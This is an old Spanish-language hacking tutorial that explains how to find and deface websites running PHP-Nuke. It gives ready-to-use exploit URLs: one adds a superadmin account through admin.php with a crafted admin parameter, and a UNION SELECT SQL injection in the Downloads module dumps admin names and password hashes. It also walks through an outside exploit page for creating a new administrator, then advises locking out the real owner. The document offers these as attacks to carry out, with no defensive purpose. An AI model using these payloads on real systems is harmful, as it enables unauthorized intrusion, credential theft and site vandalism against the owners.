Bug en php-nuke (ANTIGUO)

{================================================================================}
{ [ Deface php-nuke ] }
{================================================================================}
{ }
{ [ Bug en php-nuke ] }
{ Manual Creado Por s3b4 }
{ Dudas o comentarios A s3b4_kpo@entrones.com.mx }
{ }
{================================================================================}

Para localizar webs en php-nuke, vas a cualquier buscador (Google, yahoo) y ponemos en buscar: Webs php-nuke, powered by php-nuke o hecho con php-nuke, y encontraras muchas webs.

El Bug de acontinuacion es uno de los mas sencillos de usar
Tenes que modificarlo a tu Gusto, cambia lo que este entre [] (Tenes que sacar [] al rellenar con los datos nesesarios)

Bug:admin.php?op=AddAuthor&add_aid=[Aca el nombre del admin que quieras]&add_name=God&add_pwd=[Aca La Contraseña que quieras]&add_email=[Aca Tu E-mail el que quieras]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

Mira el EJ:

http://www.La-Web.com/admin.php?op=AddAuthor&add_aid=[Aca el nombre de de ID]&add_name=God&add_pwd=[Aca La Contraseña]&add_email=[Aca Tu E-mail]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

Si la web es vulnerable, te llevara a el login del Admin y ahi tenes que poner:

NOmbre Del Admin: EL que pusiste
Contraseña: la que pusiste

y ya estas adentro, listo para modificar lo que quieras

==================================================================
Otro Bug¬
==================================================================

Este Bug es mas Complicado, pero tenes mas posibilidades
registrate en la web, despues que estes registrado ya podes usar el Bug

Bug: modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

Mira El EJ:

http://www.La-Web.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

Si la web es vulnerable, te va a salir el nick del admin y la contraseña crakeada en MD5.

mira El EJ:

s3b4
pass: 5345f45g44df5d33dd3s3534

despues vas a http://www.hackgeneral.net/exploit.php ahi tenes que rellenar asi:

Direccion Servidor: Las Web que vas A Defacear
Nombre Admin : el nombre de admin que conseguite
Password MD5: La contraseña que conseguiste

Nombre: ahi pones cualquier nombre
Nickname: el nombre que vas a usar como admin
E-Mail: cualquier e-mail
URL: la Direcciopn de cualquier web
Password: la contraseña que vas a usar como admin

despues de rellenar eso le das a crear administrador y te va a salir algo asi:

Servidor vulnerable : http://www.La-Web-a-defacear.com
Clave Hash : a29ybjo1MmViZTQ1ZDczMDU1MjZiNjMyMmNmNjczY2QwYmIzMDo= .
Nuevo Administrador : fsfsd. En caso de que estos datos no sean correctos vuelva atras desde «Aquí».

Si son correctos continue la operacion agregando el nuevo Administrador.
Y les das al Boton que dice [Agregar Administrador]

eso te lleva a un login ahi pones tu nick name y la contraseña (la que pusiste antes en el formulario) y listo
ya estas adentro como administrador.

==================================================================
Una ves dentro¬
==================================================================
una vez que estes adentro anda a [Editar Admins] y cambia los datos de la cuenta Administrador God (la cuenta god no se borra) para que el administrador tarde en recuperar su Web =)!
hasta aca te ayudo despues segui vos solito =)

===> Manual creado por s3b4 <===
===> Dudas o comentarios a s3b4_kpo@entrones.com.mx <===
===> Este manual esta echo para que lo entiendas los idiotas (sin ofender) jaja =)! <===

plz pasen nuevos bug, ya que estos son preistorikos XD